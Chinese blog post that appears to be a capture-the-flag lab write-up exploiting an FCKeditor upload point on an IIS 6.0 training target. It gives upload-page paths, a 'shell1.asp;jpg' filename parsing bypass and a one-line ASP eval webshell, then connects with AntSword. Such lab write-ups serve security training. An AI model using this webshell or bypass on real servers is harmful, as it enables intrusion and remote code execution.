TypechoJoeTheme

mmzkyl

墨者学院靶场_编辑器漏洞分析溯源(第1题)

mmzkyl博主
2021-11-03
/
0 评论
/
123 阅读
/
244 个字
/
百度已收录
11/03
本文最后更新于2021年11月03日,已超过201天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!

随笔

  • 2021-11-03 14:04
    有点搞心态,使用冰蝎折腾半天全部都是连接失败,重新上传一个马,使用蚁剑一下就连上了

目标靶场



解题思路

  • 进入题目默认页面
  • 给出了二级目录,但是不清楚一级目录路径,先进行目录扫描
  • 通过目录扫描确定其为FCK editor,尝试对其进行利用(百度)
  • 通过目录结果能够确定如下链接(版本信息)
    http http://219.153.49.228:40620/fckeditor/editor/dialog/fck_about.html http://219.153.49.228:40620/FCKeditor/_whatsnew.html # 该链接能够确定FCK editor版本信息
  • 通过目录扫描确定如下链接(上传点)
    shell http://219.153.49.228:40620/FCKeditor/editor/filemanager/connectors/test.html http://219.153.49.228:40620/FCKeditor/editor/filemanager/connectors/uploadtest.html
  • 直接在上传点进行绕过尝试(失败)后,尝试获取中间件信息
  • 得知其为IIS 6.0,配合大名鼎鼎(臭名昭著)的IIS 6.0解析漏洞再次进行上传尝试,先将文件改名为:shell1.asp;jpg
    shell <%eval request("a")%>
  • 再次进行上传
  • 获取到上传路径后,使用蚁剑进行连接即可
  • 按照题目要求寻找相应文件并提交即可
赞(2)
评论 (0)

互动读者

  • เว็บแท่งหวยออนไลน์闲逛

    评论 1 次 | 文章 0 篇

  • slot terbaru闲逛

    评论 1 次 | 文章 0 篇

  • mobil odeme bozum闲逛

    评论 1 次 | 文章 0 篇

  • nmqberxi闲逛

    评论 1 次 | 文章 0 篇

标签云